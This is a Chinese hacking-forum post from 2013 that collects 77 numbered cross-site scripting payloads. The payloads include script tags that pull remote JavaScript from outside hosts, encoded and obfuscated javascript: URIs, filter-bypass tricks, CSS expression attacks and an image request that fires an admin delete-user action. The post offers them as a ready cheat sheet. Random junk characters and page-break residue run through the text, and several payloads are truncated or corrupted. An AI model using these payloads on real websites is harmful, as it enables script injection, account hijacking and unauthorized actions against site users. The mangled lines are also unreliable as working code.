找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2725|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
2 Y4 w5 V$ q5 [0 b(1)普通的XSS JavaScript注入  l1 r, n" M: @  k$ Q, C, B  f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
; y7 P' }5 S4 U3 {! G, R3 U(2)IMG标签XSS使用JavaScript命令
/ H( Q9 }& ~: e9 z8 y8 V5 i! r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
1 i; f! B9 I7 k. n% b(3)IMG标签无分号无引号6 V# x2 D2 M3 _  @2 T
<IMG SRC=javascript:alert(‘XSS’)>$ N4 s5 h. Y+ t; @* x7 i
(4)IMG标签大小写不敏感
4 ^/ p0 F4 \4 B<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& u, H( Q. i! p# s% M: f2 E
(5)HTML编码(必须有分号)
1 d, t( z+ l( Y. ^  ^$ f3 Y' p<IMG SRC=javascript:alert(“XSS”)>
$ d+ s* K1 C( A2 n6 A0 V. [(6)修正缺陷IMG标签1 N) a4 H% ]3 y9 j* }
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>6 S7 |% b+ Q0 C

! ?, ^* v% T- D2 b! w2 z: R/ W+ y! S8 a* I# V- f5 Y  [* F# x7 y$ X
(7)formCharCode标签(计算器). B: w, q9 |' a) i
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( d- Q& K* b$ b/ w* I3 j5 [, j% q5 O(8)UTF-8的Unicode编码(计算器)$ r6 h9 {9 _8 Q7 q& l
<IMG SRC=jav..省略..S')>
) U6 [$ w3 c% G2 b2 J) q7 p/ U5 t(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
: L  b1 r- N" S8 `/ j/ f8 s; _: `<IMG SRC=jav..省略..S')>
5 w3 B7 ~, h5 q/ s2 w3 D! O3 F(10)十六进制编码也是没有分号(计算器)( i; ^, l; ~+ D. r3 r# f* G
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>1 r- q; W/ g7 a. |) d; l1 |7 \7 m, a, M
(11)嵌入式标签,将Javascript分开1 G( H4 G" Z) O9 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 ^" |8 H3 s- r* t(12)嵌入式编码标签,将Javascript分开
- c1 H( N2 u, d) z<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 r" {9 o4 g% \9 z- a- l+ t1 ](13)嵌入式换行符( O, k& R/ a4 E' S4 D
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" {: h) B( O* P1 t! W6 g(14)嵌入式回车
9 k( G# ?, w7 ?- V+ r<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 O( e& u# h/ `+ I( H(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) [; ^  S% U8 g8 I5 b1 H" ]<IMG SRC=”javascript:alert(‘XSS‘)”>  _! o& |2 [6 A# y/ v; o1 G8 n% y- u5 V
(16)解决限制字符(要求同页面)( {/ R0 [. H0 I; }1 L
<script>z=’document.’</script>
; D/ ~) ^% ]7 E* U<script>z=z+’write(“‘</script>
5 i' J  {2 \" G3 C" l, E% n<script>z=z+’<script’</script>
2 h9 K- l6 S" Z1 a" }% _7 Q<script>z=z+’ src=ht’</script>! r* r0 t* }3 d, B% T+ t4 o& a3 e
<script>z=z+’tp://ww’</script>
! F* k& u0 c( Z' `<script>z=z+’w.shell’</script>
) [$ w' z9 S. P- |4 K1 T. v+ F<script>z=z+’.net/1.’</script>" v1 e0 p7 Z- J% H* @( X
<script>z=z+’js></sc’</script>+ U$ Y5 u, |* U! [
<script>z=z+’ript>”)’</script>
+ `# W( u- n5 i+ [, b% A; v<script>eval_r(z)</script>! R0 z$ P' {+ Y9 c9 K
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
) k: S* U2 s3 W% F# phttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
) G$ }) U, A1 p" d  m1 S! Pperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 V" N) n" w) Y1 d
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用& o3 q+ e( C! D7 ^6 |
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out! L: o' l+ p8 K* [- ~/ h$ f3 O$ i
(19)Spaces和meta前的IMG标签* x. {: W$ \+ v3 n' S. L! z+ [
<IMG SRC=” javascript:alert(‘XSS’);”>" _6 N  @  K/ ]  W' `8 V9 O
(20)Non-alpha-non-digit XSS
; S' z- a% O* O0 Q8 v5 J<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ o7 s5 e+ r3 E* B. e- b% d(21)Non-alpha-non-digit XSS to 21 y5 j% `6 O& p2 {; `& P- E% P2 i
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) g; F) {, e( C$ @% t
(22)Non-alpha-non-digit XSS to 3/ W$ H8 W! M3 e2 a2 |5 w! y
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 x. w2 `$ Y; ^0 ?( Z/ ?+ x
(23)双开括号9 k/ w1 B+ u; p) H9 k: V
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; |3 T. T  M3 b$ }
(24)无结束脚本标记(仅火狐等浏览器)$ u( N3 Y/ I- o2 j" ^& F
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>; t! x( T! F" H% X3 f/ {
(25)无结束脚本标记2
& y6 K8 T3 Y* j( W! C% \<SCRIPT SRC=//3w.org/XSS/xss.js>( F& F  C. n6 k, @2 \5 W1 ~
(26)半开的HTML/JavaScript XSS8 ~: O: M5 {' V' v& ]/ u
<IMG SRC=”javascript:alert(‘XSS’)”
1 l; ^0 K) v* M! K+ E( }+ J1 ~7 g. a(27)双开角括号; O$ Y: B' P  M4 S) i. d
<iframe src=http://3w.org/XSS.html <8 V$ X- f! Y9 l
(28)无单引号 双引号 分号% s) n9 b' \0 D% T  C: `( B
<SCRIPT>a=/XSS/
$ _  H) N) k' m, _% lalert(a.source)</SCRIPT>9 W! `, _3 w% b4 s% }7 x( [
(29)换码过滤的JavaScript
# r. \+ k5 K3 ~( e8 W  p\”;alert(‘XSS’);//6 }) a& b* O. u. c
(30)结束Title标签+ C% d9 L- B3 n
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 c0 x+ U7 Q+ V  O  y: u
(31)Input Image
/ x7 l& a! h/ f! j+ J<INPUT SRC=”javascript:alert(‘XSS’);”>9 B% x1 G( F7 m6 R
(32)BODY Image
  \+ ?  d7 h& X( D7 J$ m<BODY BACKGROUND=”javascript:alert(‘XSS’)”># v/ ?9 W5 s9 J0 p
(33)BODY标签% l9 m3 \2 }8 g
<BODY(‘XSS’)>
$ D! ^, k6 n  }) ]' {) N. q(34)IMG Dynsrc9 }* x( g+ u& g% m0 K+ g$ G) X
<IMG DYNSRC=”javascript:alert(‘XSS’)”>0 c- z, `( E3 @0 ]( O9 S7 r4 H
(35)IMG Lowsrc
5 |! s5 u- i  U) b7 R<IMG LOWSRC=”javascript:alert(‘XSS’)”>) X8 V1 W& W2 T& K
(36)BGSOUND. Z9 r  T2 r4 F. M; Q. @. B# J  Q* E+ l
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
) Q) S* i" t- K* ]9 S/ K+ X& D(37)STYLE sheet. W0 X& Y; V0 ]4 f- P
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>- O" v* `( j# ^; k; R9 v7 h  K# g: o
(38)远程样式表
; j+ P) J% }% K6 d4 Z) ]. i<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
& z  N8 ^4 I) o(39)List-style-image(列表式)
1 v+ i; e- r& L+ R; l) G5 v<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 l$ ?& ]4 S5 Y! J, [0 j0 @2 M% Z- n2 y(40)IMG VBscript1 {9 V% p5 A9 i* H6 ?
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS- C" v3 s. g3 P, Y& o+ H
(41)META链接url
; n( w# q; e, O1 E  _% {9 K" e0 C- m0 j, O& {
) D- Q6 V% t$ A9 |
<META HTTP-EQUIV=”refresh” CONTENT=”0;
. M0 P, m* ~& ~URL=http://;URL=javascript:alert(‘XSS’);”>5 D' K; f7 k8 v$ h2 A( u
(42)Iframe+ }% ]1 [* L9 L' D5 z0 N
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 U2 c: B% d0 W. M" I2 g(43)Frame4 y, C1 u6 f& M5 R+ v) `
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
5 I4 q" P4 w5 q5 ghttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
7 z2 s9 S; g5 K8 O(44)Table& Z9 x' q6 H5 d4 |
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>% Q& ]# H4 a1 B5 H* w# X
(45)TD4 {9 L' S! Y! _) y/ O
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) [! M# t  P0 D0 R! K' d2 A(46)DIV background-image
. e' V' k6 _0 r- V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”># K& F+ f4 i7 W' ?( A$ x4 T* X
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
+ ^, ^  y) |* U% n8&13&12288&65279), E6 v" ^& J& v: P
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ h6 ]5 B8 s7 ~3 m  S. I1 p% V/ N
(48)DIV expression
  n5 ^& ?) o, {$ [<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ i" i% s! a- J(49)STYLE属性分拆表达
8 d3 ?& i! {$ ]9 O, I# o# [9 P<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( t  Y% W) c" o6 J" U8 R8 @( I(50)匿名STYLE(组成:开角号和一个字母开头)8 }/ W7 d4 \# t: Y( J' U' o
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 S; w# V0 o7 {" e# H+ q/ {
(51)STYLE background-image7 q+ v  {% ^- `4 g( g  c3 P
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
0 H0 h) S+ H* R0 e+ UCLASS=XSS></A>
3 y, ?! Y& X! s" T9 K" ]* i3 O2 o. N(52)IMG STYLE方式$ T3 A6 @( N1 a9 T! T6 F! y
exppression(alert(“XSS”))’>% O  Y) S0 Q1 y5 H1 A  _" K
(53)STYLE background5 e$ s; P8 s/ d: J, _8 v) _0 I2 z1 q
<STYLE><STYLE. {9 i1 w, B; H9 P  T: `5 @2 T& B
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. R7 J, o6 \9 F
(54)BASE
, A# [: h& Z: D! w& @& a<BASE HREF=”javascript:alert(‘XSS’);//”>0 ~2 ~3 K+ y0 f& t) {5 a
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 q! F, A) w: T) E) n# J# B<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
+ b1 q4 t. I8 e" i4 v3 M(56)在flash中使用ActionScrpt可以混进你XSS的代码
( m6 ^. A' p: h0 U% m. w3 C# ma=”get”;; `. \5 a' p$ m
b=”URL(\”";' O, r( A: Q" p- E: j" m2 a
c=”javascript:”;
8 Y: f- `7 p7 }d=”alert(‘XSS’);\”)”;
& m$ T# o) o$ R# q; veval_r(a+b+c+d);; N+ |6 k0 h- ^0 |& o
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
0 }( g: P. W- |" ~<HTML xmlns:xss>5 _3 x1 f# ]; e: h" M0 B1 n
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% f3 a4 `# p/ D, M- w
<xss:xss>XSS</xss:xss>1 _- o& ~3 t  I9 X$ I
</HTML>3 ~+ d* I' h2 t- `" o
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
$ W4 p( R  K. N  N) s6 p<SCRIPT SRC=””></SCRIPT>
8 @! J( M; Y& u" g& i(59)IMG嵌入式命令,可执行任意命令
* e: V; z3 |4 X0 g0 w# e& t/ h<IMG SRC=”http://www.XXX.com/a.php?a=b”>
9 m! G6 n- T3 k! Y8 o0 N; q(60)IMG嵌入式命令(a.jpg在同服务器)9 H' Z4 I) u) M! l" w; k
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
. \' O- |9 |6 b  R% z(61)绕符号过滤
' Q) m" \7 q, }<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 c* e. Y) s% C6 z& h& j' H$ S* I
(62)' c( B+ a/ r# L# A* c
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 J3 e# p- e/ a9 a% w(63)
/ r5 ]/ v& S$ z3 A4 q0 A- k<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 o( s- x. T3 ~4 O* \: k(64), A/ h5 H# A2 ]
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>. C3 K7 _' S2 H6 W+ }  L
(65); a# w) D+ K5 D2 |6 A, @3 B3 F
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
! C- k; t. D$ j1 j/ Z5 t5 O(66)12-7-1 T00LS - Powered by Discuz! Board
. I5 i3 g# b" y' ]+ Dhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
4 X$ ~1 w4 s$ H7 T5 F8 S& ^! a<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 A) n- {& G- H" [$ H; F(67)
0 i7 T- r, N& T% A<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>( x: C  W+ h; Y9 [1 \9 x* Q! U1 x
</SCRIPT>
; ^/ t- U& B, @( C(68)URL绕行
+ ?. [! ]1 P: A2 e% p<A HREF=”http://127.0.0.1/”>XSS</A>. D4 U8 Y: D( d' S  o
(69)URL编码- f6 n% k# L8 s  V- j
<A HREF=”http://3w.org”>XSS</A>
* w" E+ D8 j+ A0 r' ~(70)IP十进制
- H' ~2 f$ y9 @' l<A HREF=”http://3232235521″>XSS</A>
; r) w  i9 o% c; l(71)IP十六进制
( L6 G4 g% i4 N<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>7 C9 s: ?* o% Q" h3 E8 |; j8 n
(72)IP八进制6 w5 P; @: @' {5 |  W% Q& f
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
+ W1 D+ e6 G  Y3 m4 x(73)混合编码+ _! `, l5 J& ~( e% H6 ~7 m+ x
<A HREF=”h* P& t7 @' s4 J1 d' v3 m( y6 }
tt p://6 6.000146.0×7.147/”">XSS</A>
% ^" y* k3 @, ~0 C(74)节省[http:]
  U; H6 M3 x. o) C) s( w. A0 q<A HREF=”//www.google.com/”>XSS</A>
0 J/ P* D0 R, \(75)节省[www]
6 W6 C% e5 L- z! p; I/ H& r<A HREF=”http://google.com/”>XSS</A>
- `3 t" ?% O/ `4 [7 [$ s(76)绝对点绝对DNS/ C9 X$ o" N# i' E
<A HREF=”http://www.google.com./”>XSS</A>
/ b8 B  o( ]- _) J: A' `(77)javascript链接
5 O* r  o3 H1 r& y" s# P% m<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
( i1 z! A4 D  O/ L
* [2 |5 i. f' E* @9 O原文地址:http://fuzzexp.org/u/0day/?p=14
5 a0 {' X' N4 |, _! o) R2 P! k7 a
, C/ K" R# r# m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表